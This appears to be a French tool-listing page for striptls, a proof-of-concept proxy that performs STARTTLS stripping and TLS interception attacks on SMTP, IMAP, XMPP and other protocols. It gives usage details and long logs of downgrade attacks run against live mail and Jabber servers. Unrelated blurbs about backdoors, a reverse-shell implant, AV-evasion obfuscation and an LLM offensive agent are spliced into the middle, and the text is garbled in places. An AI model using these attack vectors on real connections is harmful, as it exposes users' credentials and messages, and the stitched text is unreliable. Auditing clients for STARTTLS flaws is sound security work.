
implémentation d'un proxy PoC pour les attaques de dévoiement STARTTLS

Une implémentation générique de proxy TCP et outil d'audit pour effectuer des interceptions ssl/tls indépendantes du protocole et des attaques de délestage STARTTLS sur SMTP, POP3, IMAP, FTP, NNTP, XMPP, ACAP et .
IRCPython2!
//Vous avez découvert une vulnérabilité grâce à ce projet ? Envoyez-moi un message !
SSLContext) < Python 3--key=server.pemRésultats :```python
[Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
[Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>
[ ] <class striptls.StripFromCapabilities at 0xffd316bc>
[Vulnerable!] <class striptls.StripWithError at 0xffd4614c>
[Vulnerable!] <class striptls.StripInboundTLS at 0x7f08319a6808>
[Vulnerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>
[Vulnerable!] <class striptls.UntrustedIntercept at 0x7f08319a6870>
## Utilisation```
#> python2 -m pip install striptls
#> python2 -m striptls --help
Pentesting Post-ExploitationReaper est un framework d'émulation d'attaquant conçu pour tester et améliorer les capacités de détection des produits de sécurité. Il permet d'automatiser des activités de simulation d'adversaire telles que l'exécution de commandes, les opérations sur les fichiers et bien plus encore, avec plusieurs agents et C2.
Windows Drivers DetectionUne réimplémentation en Rust du projet LOLDrivers, offrant une interface web pour explorer un ensemble de données organisé de pilotes vulnérables. Il aide à détecter les pilotes vulnérables dans les environnements Windows en utilisant une approche API-first.
LLM OffensiveCe dépôt contient le code de GoblinHacker, un agent de sécurité offensif basé sur LLM qui automatise les tâches de test d'intrusion. Il exploite les capacités de raisonnement des modèles de langage pour planifier et exécuter des attaques, en intégrant divers outils open-source.
Java Memshell GeneratorCet outil est dédié à la génération de code de mémoire shell Java. Il prend en charge diverses configurations, y compris différents types de charges utiles, le chiffrement et les techniques de chargement de classes pour faciliter les tests de sécurité.
Active Directory BackdoorADAssassin est un script de porte dérobée Active Directory qui exploite une mauvaise configuration connue, permettant la création d'un utilisateur de porte dérobée en abusant de l'attribut Manager d'un utilisateur sélectionné, sans nécessiter de privilèges administrateur.
Windows Malware Analysis UnpackerCet outil est conçu pour dépaqueter les malwares Windows x64 protégés par Warp Key Exchanger (WarpKex). Il automatise le processus d'extraction et de déchiffrement des charges intégrées à partir de ces échantillons.
LLM Code AnalysisCodeSight est un outil propulsé par LLM conçu pour analyser le code et fournir rapidement des informations axées sur la sécurité. Il fonctionne directement depuis la ligne de commande, aidant les développeurs et les chercheurs en sécurité à identifier les vulnérabilités potentielles.
Backdoor LinuxMystery-Wire est une porte dérobée sous Linux écrite en Golang et C. Elle offre une capacité de reverse shell simple avec des fonctionnalités supplémentaires de triage système (collecte d'informations matérielles, IP externe, etc.), en se concentrant sur la fourniture d'une charge utile légère et fonctionnelle.
Golang ObfuscationCe dépôt fournit des méthodes pour obscurcir les binaires Golang afin d'éviter la détection basée sur les signatures. Il comprend des techniques telles que l'obscurcissement des chaînes et la manipulation des binaires pour réduire la détectabilité des programmes Go compilés.
Obscurcissement de chaînes : Cache les chaînes dans le binaire en utilisant XOR et d'autres méthodes.
Manipulation de binaires : Techniques pour modifier la signature du binaire compilé.
Évitement de signatures : Vise à contourner l'analyse statique et la détection AV.
Spécifique à Go : Adapté spécifiquement aux binaires Golang.``` #> python -m striptls --help # from pip/setup.py #> python striptls --help # from source / root folder Usage: striptls.py [options]
example: striptls.py --listen 0.0.0.0:25 --remote mail.server.tld:25
Options: -h, --help show this help message and exit -q, --quiet be quiet [default: True] -l LISTEN, --listen=LISTEN listen ip:port [default: 0.0.0.0:<remote_port>] -r REMOTE, --remote=REMOTE remote target ip:port to forward sessions to -k KEY, --key=KEY SSL Certificate and Private key file to use, PEM format assumed [default: server.pem] -s, --generic-ssl-intercept dynamically intercept SSL/TLS -b BUFFER_SIZE, --bufsiz=BUFFER_SIZE -x VECTORS, --vectors=VECTORS Comma separated list of vectors. Use 'ALL' (default) to select all vectors, 'NONE' for tcp/ssl proxy mode. Available vectors: ACAP.StripFromCapabilities, ACAP.StripWithError, ACAP.UntrustedIntercept, FTP.StripFromCapabilities, FTP.StripWithError, FTP.UntrustedIntercept, GENERIC.Intercept, IMAP.ProtocolDowngradeToV2, IMAP.StripFromCapabilities, IMAP.StripWithError, IMAP.UntrustedIntercept, IRC.StripCAPWithNotRegistered, IRC.StripFromCapabilities, IRC.StripWithError, IRC.StripWithNotRegistered, IRC.StripWithSilentDrop, IRC.UntrustedIntercept, NNTP.StripFromCapabilities, NNTP.StripWithError, NNTP.UntrustedIntercept, POP3.StripFromCapabilities, POP3.StripWithError, POP3.UntrustedIntercept, SMTP.InboundStarttlsProxy, SMTP.InjectCommand, SMTP.ProtocolDowngradeStripExtendedMode, SMTP.StripFromCapabilities, SMTP.StripWithError, SMTP.StripWithInvalidResponseCode, SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept, XMPP.StripFromCapabilities, XMPP.StripInboundTLS, XMPP.UntrustedIntercept [default: ALL]
## Installation (optionnelle)
depuis pip
#> pip install striptls
depuis les sources
#> setup.py install
## Exemples
entrant sortant
[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
smtp-client striptls remote/target
`smtp-client` local -> `localhost:8825` (proxy) -> `mail.gmx.net:25`
### Interception SSL/TLS générique
`--generic-ssl-intercept` est un commutateur global pour activer la détection générique de handshake SSL/TLS et la conversion de session. Peut être combiné avec n’importe quel mangle/vector.
`GENERIC.Intercept` est une implémentation de mangle/vector de la fonctionnalité de détection et conversion de handshake SSL/TLS.
# python striptls.py -l 0.0.0.0:9999 -r mail.gmx.com:465 -x GENERIC.Intercept
- INFO - <Proxy 0x1fdcf50 listen=('0.0.0.0', 9999) target=('mail.gmx.com', 465)> ready.
- DEBUG - * added vector (port:None , proto: GENERIC): <class __main__.Intercept at 0x0218AAB0>
- INFO - <RewriteDispatcher ssl/tls_intercept=False vectors={None: set([<class __main__.Intercept at 0x0218AAB0>])}>
- INFO - <Session 0x1ff00b0> client ('127.0.0.1', 8228) has connected
- INFO - <Session 0x1ff00b0> connecting to target ('mail.gmx.com', 465)
- DEBUG - <RewriteDispatcher - changed mangle: __main__.Intercept new: True>
- INFO - ProtocolDetect: SSL/TLS version: TLS_1_0
- INFO - SSL Handshake detected - performing ssl/tls conversion
- DEBUG - <Session 0x1ff00b0> [client] <> [ ] SSL handshake done: ('ECDHE-RSA-AES256-GCM-SHA384', 'TLSv1/SSLv3', 256)
- DEBUG - <Session 0x1ff00b0> [ ] <> [server] SSL handshake done: ('DHE-RSA-AES256-GCM-SHA384', 'TLSv1/SSLv3', 256)
- DEBUG - <Session 0x1ff00b0> [client] <= [server] '220 gmx.com (mrgmx101) Nemesis ESMTP Service ready\r\n'
- DEBUG - <Session 0x1ff00b0> [client] => [server] 'hi\r\n'
- DEBUG - <Session 0x1ff00b0> [client] <= [server] '500 Syntax error, command unrecognized\r\n'
# python striptls.py -l 0.0.0.0:9999 -r mail.gmx.com:25 -x NONE --generic-ssl-intercept
- INFO - <Proxy 0x1efbf70 listen=('0.0.0.0', 9999) target=('mail.gmx.com', 25)> ready.
- INFO - <RewriteDispatcher ssl/tls_intercept=True vectors={}>
- DEBUG - <ProtocolDetect 0x1f21b70 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
- INFO - <Session 0x1f10110> client ('127.0.0.1', 8290) has connected
- INFO - <Session 0x1f10110> connecting to target ('mail.gmx.com', 25)
- DEBUG - <Session 0x1f10110> [client] <= [server] '220 gmx.com (mrgmx101) Nemesis ESMTP Service ready\r\n'
- DEBUG - <Session 0x1f10110> [client] => [server] 'EHLO openssl.client.net\r\n'
- DEBUG - <Session 0x1f10110> [client] <= [server] '250-gmx.com Hello openssl.client.net [xxx.xxx.xxx.xxx]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
- DEBUG - <Session 0x1f10110> [client] => [server] 'STARTTLS\r\n'
- DEBUG - <Session 0x1f10110> [client] <= [server] '220 OK\r\n'
- INFO - ProtocolDetect: SSL/TLS version: TLS_1_0
- INFO - SSL Handshake detected - performing ssl/tls conversion
- DEBUG - <Session 0x1f10110> [client] <> [ ] SSL handshake done: ('ECDHE-RSA-AES256-GCM-SHA384', 'TLSv1/SSLv3', 256)
- DEBUG - <Session 0x1f10110> [ ] <> [server] SSL handshake done: ('DHE-RSA-AES256-GCM-SHA384', 'TLSv1/SSLv3', 256)
- DEBUG - <Session 0x1f10110> [client] => [server] 'EHLO A\r\n'
- DEBUG - <Session 0x1f10110> [client] <= [server] '250-gmx.com Hello A [xxx.xxx.xxx.xxx]\r\n250-SIZE 69920427\r\n250AUTH LOGIN PLAIN\r\n'
### Mode Audit
Itère tous les cas spécifiques au protocole par client et garde la trace des clients qui violent le protocole starttls. Ctrl+C pour interrompre l’audit et afficher les résultats.
#> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
- INFO - <Proxy 0xffcf6d0cL listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
- DEBUG - * added test (port:21 , proto: FTP): <class striptls.StripFromCapabilities at 0xffd4632c>
- DEBUG - * added test (port:21 , proto: FTP): <class striptls.StripWithError at 0xffd4635c>
- DEBUG - * added test (port:21 , proto: FTP): <class striptls.UntrustedIntercept at 0xffd4638c>
- DEBUG - * added test (port:143 , proto: IMAP): <class striptls.StripFromCapabilities at 0xffd4626c>
- DEBUG - * added test (port:143 , proto: IMAP): <class striptls.StripWithError at 0xffd4629c>
- DEBUG - * added test (port:143 , proto: IMAP): <class striptls.UntrustedIntercept at 0xffd462cc>
- DEBUG - * added test (port:119 , proto: NNTP): <class striptls.StripFromCapabilities at 0xffd463ec>
- DEBUG - * added test (port:119 , proto: NNTP): <class striptls.StripWithError at 0xffd4641c>
- DEBUG - * added test (port:119 , proto: NNTP): <class striptls.UntrustedIntercept at 0xffd4644c>
- DEBUG - * added test (port:110 , proto: POP3): <class striptls.StripWithError at 0xffd461dc>
- DEBUG - * added test (port:110 , proto: POP3): <class striptls.UntrustedIntercept at 0xffd4620c>
- DEBUG - * added test (port:25 , proto: SMTP): <class striptls.StripFromCapabilities at 0xffd316bc>
- DEBUG - * added test (port:25 , proto: SMTP): <class striptls.StripWithError at 0xffd4614c>
- DEBUG - * added test (port:25 , proto: SMTP): <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
- DEBUG - * added test (port:25 , proto: SMTP): <class striptls.StripWithTemporaryError at 0xffd4611c>
- DEBUG - * added test (port:25 , proto: SMTP): <class striptls.UntrustedIntercept at 0xffd4617c>
- DEBUG - * added test (port:5222 , proto: XMPP): <class striptls.StripFromCapabilities at 0xffd464ac>
- INFO - <RewriteDispatcher vectors={5222: set([<class striptls.StripFromCapabilities at 0xffd464ac>]), 110: set([<class striptls.UntrustedIntercept at 0xffd4620c>, <class striptls.StripWithError at 0xffd461dc>]), 143: set([<class striptls.StripWithError at 0xffd4629c>, <class striptls.UntrustedIntercept at 0xffd462cc>, <class striptls.StripFromCapabilities at 0xffd4626c>]), 21: set([<class striptls.UntrustedIntercept at 0xffd4638c>, <class striptls.StripFromCapabilities at 0xffd4632c>, <class striptls.StripWithError at 0xffd4635c>]), 119: set([<class striptls.StripWithError at 0xffd4641c>, <class striptls.UntrustedIntercept at 0xffd4644c>, <class striptls.StripFromCapabilities at 0xffd463ec>]), 25: set([<class striptls.StripWithInvalidResponseCode at 0xffd3138c>, <class striptls.StripWithTemporaryError at 0xffd4611c>, <class striptls.StripFromCapabilities at 0xffd316bc>, <class striptls.StripWithError at 0xffd4614c>, <class striptls.UntrustedIntercept at 0xffd4617c>])}>
- DEBUG - <ProtocolDetect 0xffcf6eccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
- INFO - <Session 0xffcf6e4cL> client ('127.0.0.1', 28902) has connected
- INFO - <Session 0xffcf6e4cL> connecting to target ('mail.gmx.net', 25)
- DEBUG - <Session 0xffcf6e4cL> [client] <= [server] '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
- DEBUG - <RewriteDispatcher - changed mangle: striptls.StripWithInvalidResponseCode new: True>
- DEBUG - <Session 0xffcf6e4cL> [client] => [server] 'ehlo [192.168.139.1]\r\n'
- DEBUG - <Session 0xffcf6e4cL> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
- DEBUG - <Session 0xffcf6e4cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
- DEBUG - <Session 0xffcf6e4cL> [client] => [server] 'STARTTLS\r\n'
- DEBUG - <Session 0xffcf6e4cL> [client] <= [server][mangled] '200 STRIPTLS\r\n'
- DEBUG - <Session 0xffcf6e4cL> [client] => [server][mangled] None
- DEBUG - <Session 0xffcf6e4cL> [client] => [server] 'mail FROM:<[email protected]> size=10\r\n'
- DEBUG - <Session 0xffcf6e4cL> [client] <= [server] '530 Authentication required\r\n'
- DEBUG - <Session 0xffcf6e4cL> [client] => [server] 'rset\r\n'
- DEBUG - <Session 0xffcf6e4cL> [client] <= [server] '250 OK\r\n'
- WARNING - <Session 0xffcf6e4cL> terminated.
- DEBUG - <ProtocolDetect 0xffd0920cL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
- INFO - <Session 0xffd0918cL> client ('127.0.0.1', 28905) has connected
- INFO - <Session 0xffd0918cL> connecting to target ('mail.gmx.net', 25)
- DEBUG - <Session 0xffd0918cL> [client] <= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
- DEBUG - <RewriteDispatcher - changed mangle: striptls.StripWithTemporaryError new: True>
- DEBUG - <Session 0xffd0918cL> [client] => [server] 'ehlo [192.168.139.1]\r\n'
- DEBUG - <Session 0xffd0918cL> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
- DEBUG - <Session 0xffd0918cL> [client] => [server] 'STARTTLS\r\n'
- DEBUG - <Session 0xffd0918cL> [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
- DEBUG - <Session 0xffd0918cL> [client] => [server][mangled] None
- DEBUG - <Session 0xffd0918cL> [client] => [server] 'mail FROM:<[email protected]> size=10\r\n'
- DEBUG - <Session 0xffd0918cL> [client] <= [server] '530 Authentication required\r\n'
- DEBUG - <Session 0xffd0918cL> [client] => [server] 'rset\r\n'
- DEBUG - <Session 0xffd0918cL> [client] <= [server] '250 OK\r\n'
- WARNING - <Session 0xffd0918cL> terminated.
- DEBUG - <ProtocolDetect 0xffd092ecL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
- INFO - <Session 0xffd0926cL> client ('127.0.0.1', 28908) has connected
- INFO - <Session 0xffd0926cL> connecting to target ('mail.gmx.net', 25)
- DEBUG - <Session 0xffd0926cL> [client] <= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
- DEBUG - <RewriteDispatcher - changed mangle: striptls.StripFromCapabilities new: True>
- DEBUG - <Session 0xffd0926cL> [client] => [server] 'ehlo [192.168.139.1]\r\n'
- DEBUG - <Session 0xffd0926cL> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
- DEBUG - <Session 0xffd0926cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
- WARNING - <Session 0xffd0926cL> terminated.
- DEBUG - <ProtocolDetect 0xffd093ccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
- INFO - <Session 0xffd0934cL> client ('127.0.0.1', 28911) has connected
- INFO - <Session 0xffd0934cL> connecting to target ('mail.gmx.net', 25)
- DEBUG - <Session 0xffd0934cL> [client] <= [server] '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
- DEBUG - <RewriteDispatcher - changed mangle: striptls.StripWithError new: True>
- DEBUG - <Session 0xffd0934cL> [client] => [server] 'ehlo [192.168.139.1]\r\n'
- DEBUG - <Session 0xffd0934cL> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
- DEBUG - <Session 0xffd0934cL> [client] => [server] 'STARTTLS\r\n'
- DEBUG - <Session 0xffd0934cL> [client] <= [server][mangled] '501 Syntax error\r\n'
- DEBUG - <Session 0xffd0934cL> [client] => [server][mangled] None
- DEBUG - <Session 0xffd0934cL> [client] => [server] 'mail FROM:<[email protected]> size=10\r\n'
- DEBUG - <Session 0xffd0934cL> [client] <= [server] '530 Authentication required\r\n'
- DEBUG - <Session 0xffd0934cL> [client] => [server] 'rset\r\n'
- DEBUG - <Session 0xffd0934cL> [client] <= [server] '250 OK\r\n'
- WARNING - <Session 0xffd0934cL> terminated.
- WARNING - Ctrl C - Stopping server
- INFO - -- audit results --
- INFO - [*] client: 127.0.0.1
- INFO - [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
- INFO - [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>
- INFO - [ ] <class striptls.StripFromCapabilities at 0xffd316bc>
- INFO - [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>
### Supprimer STARTTLS des capacités du serveur
#> python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripFromCapabilities
- INFO - <Proxy 0x1fe6e70 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
- INFO - <RewriteDispatcher attacks={25: set([<class __main__.StripFromCapabilities at 0x01FE77D8>])}>
- DEBUG - <ProtocolDetect 0x1fe6f90 is_protocol=PROTO_SMTP len_history=0> - protocol detected (target port)
- INFO - <Session 0x1fe6f10> client ('127.0.0.1', 20070) has connected
- INFO - <Session 0x1fe6f10> connecting to target ('mail.gmx.net', 25)
- DEBUG - <Session 0x1fe6f10> [client] <= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
- DEBUG - <Session 0x1fe6f10> [client] => [server] 'ehlo [192.168.139.1]\r\n'
- DEBUG - <Session 0x1fe6f10> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
- DEBUG - <Session 0x1fe6f10> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
- DEBUG - <Session 0x1fe6f10> [client] => [server] 'mail FROM:<[email protected]> size=10\r\n'
- DEBUG - <Session 0x1fe6f10> [client] <= [server] '530 Authentication required\r\n'
- DEBUG - <Session 0x1fe6f10> [client] => [server] 'rset\r\n'
- DEBUG - <Session 0x1fe6f10> [client] <= [server] '250 OK\r\n'
- WARNING - <Session 0x1fe6f10> terminated.
### Code de réponse STARTTLS invalide
#> python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripWithInvalidResponseCode
- INFO - <Proxy 0x1fefe70 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
- INFO - <RewriteDispatcher attacks={25: set([<class __main__.StripWithInvalidResponseCode at 0x02010730>])}>
- DEBUG - <ProtocolDetect 0x1feff90 is_protocol=PROTO_SMTP len_history=0> - protocol detected (target port)
- INFO - <Session 0x1feff10> client ('127.0.0.1', 20061) has connected
- INFO - <Session 0x1feff10> connecting to target ('mail.gmx.net', 25)
- DEBUG - <Session 0x1feff10> [client] <= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
- DEBUG - <Session 0x1feff10> [client] => [server] 'ehlo [192.168.139.1]\r\n'
- DEBUG - <Session 0x1feff10> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
- DEBUG - <Session 0x1feff10> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
- DEBUG - <Session 0x1feff10> [client] => [server] 'STARTTLS\r\n'
- DEBUG - <Session 0x1feff10> [client] <= [server][mangled] '200 STRIPTLS\r\n'
- DEBUG - <Session 0x1feff10> [client] => [server][mangled] None
- DEBUG - <Session 0x1feff10> [client] => [server] 'mail FROM:<[email protected]> size=10\r\n'
- DEBUG - <Session 0x1feff10> [client] <= [server] '530 Authentication required\r\n'
- DEBUG - <Session 0x1feff10> [client] => [server] 'rset\r\n'
- DEBUG - <Session 0x1feff10> [client] <= [server] '250 OK\r\n'
- WARNING - <Session 0x1feff10> terminated.
### Interception SSL non fiable (pour les clients ne vérifiant pas la confiance du certificat serveur)
#> python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.UntrustedIntercept
- INFO - <Proxy 0x1f468f0 listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
- INFO - <RewriteDispatcher attacks={25: set([<class __main__.UntrustedIntercept at 0x01F45298>])}>
- DEBUG - <ProtocolDetect 0x1f46a10 protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
- INFO - <Session 0x1f46990> client ('127.0.0.1', 20238) has connected
- INFO - <Session 0x1f46990> connecting to target ('mail.gmx.net', 25)
- DEBUG - <Session 0x1f46990> [client] <= [server] '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
- DEBUG - <Session 0x1f46990> [client] => [server] 'ehlo [192.168.139.1]\r\n'
- DEBUG - <Session 0x1f46990> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
- DEBUG - <Session 0x1f46990> [client] => [server] 'STARTTLS\r\n'
- DEBUG - <Session 0x1f46990> [client] <= [server][mangled] '220 Go ahead\r\n'
- DEBUG - <Session 0x1f46990> [client] <= [server][mangled] waiting for inbound SSL Handshake
- DEBUG - <Session 0x1f46990> [client] => [server] 'STARTTLS\r\n'
- DEBUG - <Session 0x1f46990> [client] => [server][mangled] performing outbound SSL handshake
- DEBUG - <Session 0x1f46990> [client] => [server][mangled] None
- DEBUG - <Session 0x1f46990> [client] => [server] 'ehlo [192.168.139.1]\r\n'
- DEBUG - <Session 0x1f46990> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\r\n250-SIZE 69920427\r\n250 AUTH LOGIN PLAIN\r\n'
- DEBUG - <Session 0x1f46990> [client] => [server] 'mail FROM:<[email protected]> size=10\r\n'
- DEBUG - <Session 0x1f46990> [client] <= [server] '530 Authentication required\r\n'
- DEBUG - <Session 0x1f46990> [client] => [server] 'rset\r\n'
- DEBUG - <Session 0x1f46990> [client] <= [server] '250 OK\r\n'
- WARNING - <Session 0x1f46990> terminated.
### Piste d’audit XMPP
Exemple : Pidgin avec sécurité de transport optionnelle.
#### XMPP.StripInboundTLS - Entrant en clair - Sortant TLS - au cas où le serveur exige starttlspython striptls --listen 0.0.0.0:5222 --remote jabber.ccc.de:5222 -k ../server.pem
- INFO - <Proxy 0x7f08322ba310 listen=('0.0.0.0', 5222) target=('jabber.ccc.de', 5222)> ready.
...
- DEBUG - <ProtocolDetect 0x7f083196a810 protocol_id=PROTO_XMPP len_history=0> - protocol detected (target port)
...
- INFO - <Session 0x7f083196a7d0> client ('192.168.139.1', 56888) has connected
- INFO - <Session 0x7f083196a7d0> connecting to target ('jabber.ccc.de', 5222)
- DEBUG - <Session 0x7f083196a7d0> [client] => [server] "<?xml version='1.0' ?><stream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>"
- DEBUG - <RewriteDispatcher - changed mangle: striptls.StripInboundTLS new: True>
- DEBUG - <Session 0x7f083196a7d0> [client] <= [server] "<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='13821701589972978594' from='jabber.ccc.de' version='1.0' xml:lang='en'>"
- DEBUG - <Session 0x7f083196a7d0> [client] <= [server] "<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls></stream:features>"
- DEBUG - <Session 0x7f083196a7d0> [client] => [server][mangled] "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
- DEBUG - <Session 0x7f083196a7d0> [client] => [server][mangled] performing outbound SSL handshake
- DEBUG - <Session 0x7f083196a7d0> [client] <= [server][mangled] "<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/></stream:features>"
- DEBUG - <Session 0x7f083196a7d0> [client] => [server] "<iq type='get' id='purple9f914f80'><query xmlns='jabber:iq:auth'><username>tin</username></query></iq>"
- DEBUG - <Session 0x7f083196a7d0> [client] <= [server] "<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='13515446948282835507' from='jabber.ccc.de' xml:lang='en'>"
- DEBUG - <Session 0x7f083196a7d0> [client] <= [server] "<stream:error><invalid-namespace xmlns='urn:ietf:params:xml:ns:xmpp-streams'></invalid-namespace></stream:error>"
- DEBUG - <Session 0x7f083196a7d0> [client] <= [server] '</stream:stream>'
- WARNING - <Session 0x7f083196a7d0> terminated.
#### XMPP.StripFromCapabilities - suppression de l'annonce starttls du serveur
- DEBUG - <ProtocolDetect 0x7f083196a990 protocol_id=PROTO_XMPP len_history=0> - protocol detected (target port)
- INFO - <Session 0x7f083196a910> client ('192.168.139.1', 56890) has connected
- INFO - <Session 0x7f083196a910> connecting to target ('jabber.ccc.de', 5222)
- DEBUG - <Session 0x7f083196a910> [client] => [server] "<?xml version='1.0' ?><stream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>"
- DEBUG - <RewriteDispatcher - changed mangle: striptls.StripFromCapabilities new: True>
- DEBUG - <Session 0x7f083196a910> [client] <= [server] "<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='12381525525258986322' from='jabber.ccc.de' version='1.0' xml:lang='en'>"
- DEBUG - <Session 0x7f083196a910> [client] <= [server] "<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls></stream:features>"
- DEBUG - <Session 0x7f083196a910> [client] <= [server][mangled] "<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/></stream:features>"
- DEBUG - <Session 0x7f083196a910> [client] => [server] "<iq type='get' id='purplecfe2ee07'><query xmlns='jabber:iq:auth'><username>tin</username></query></iq>"
- DEBUG - <Session 0x7f083196a910> [client] <= [server] "<stream:error><policy-violation xmlns='urn:ietf:params:xml:ns:xmpp-streams'></policy-violation><text xml:lang='' xmlns='urn:ietf:params:xml:ns:xmpp-streams'>Use of STARTTLS required</text></stream:error></stream:stream>"
- WARNING - <Session 0x7f083196a910> terminated.
#### XMPP.StripUntrustedIntercept - Interception TLS entrante et sortante avec son propre certificat/clé
- DEBUG - <ProtocolDetect 0x7f083196aa90 protocol_id=PROTO_XMPP len_history=0> - protocol detected (target port)
- INFO - <Session 0x7f083196a8d0> client ('192.168.139.1', 56892) has connected
- INFO - <Session 0x7f083196a8d0> connecting to target ('jabber.ccc.de', 5222)
- DEBUG - <Session 0x7f083196a8d0> [client] => [server] "<?xml version='1.0' ?><stream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>"
- DEBUG - <RewriteDispatcher - changed mangle: striptls.UntrustedIntercept new: True>
- DEBUG - <Session 0x7f083196a8d0> [client] <= [server] "<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='10051743579572304948' from='jabber.ccc.de' version='1.0' xml:lang='en'><stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls></stream:features>"
- DEBUG - <Session 0x7f083196a8d0> [client] => [server] "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
- DEBUG - <Session 0x7f083196a8d0> [client] <= [server][mangled] "<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
- DEBUG - <Session 0x7f083196a8d0> [client] <= [server][mangled] waiting for inbound SSL Handshake
- DEBUG - <Session 0x7f083196a8d0> [client] => [server] "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
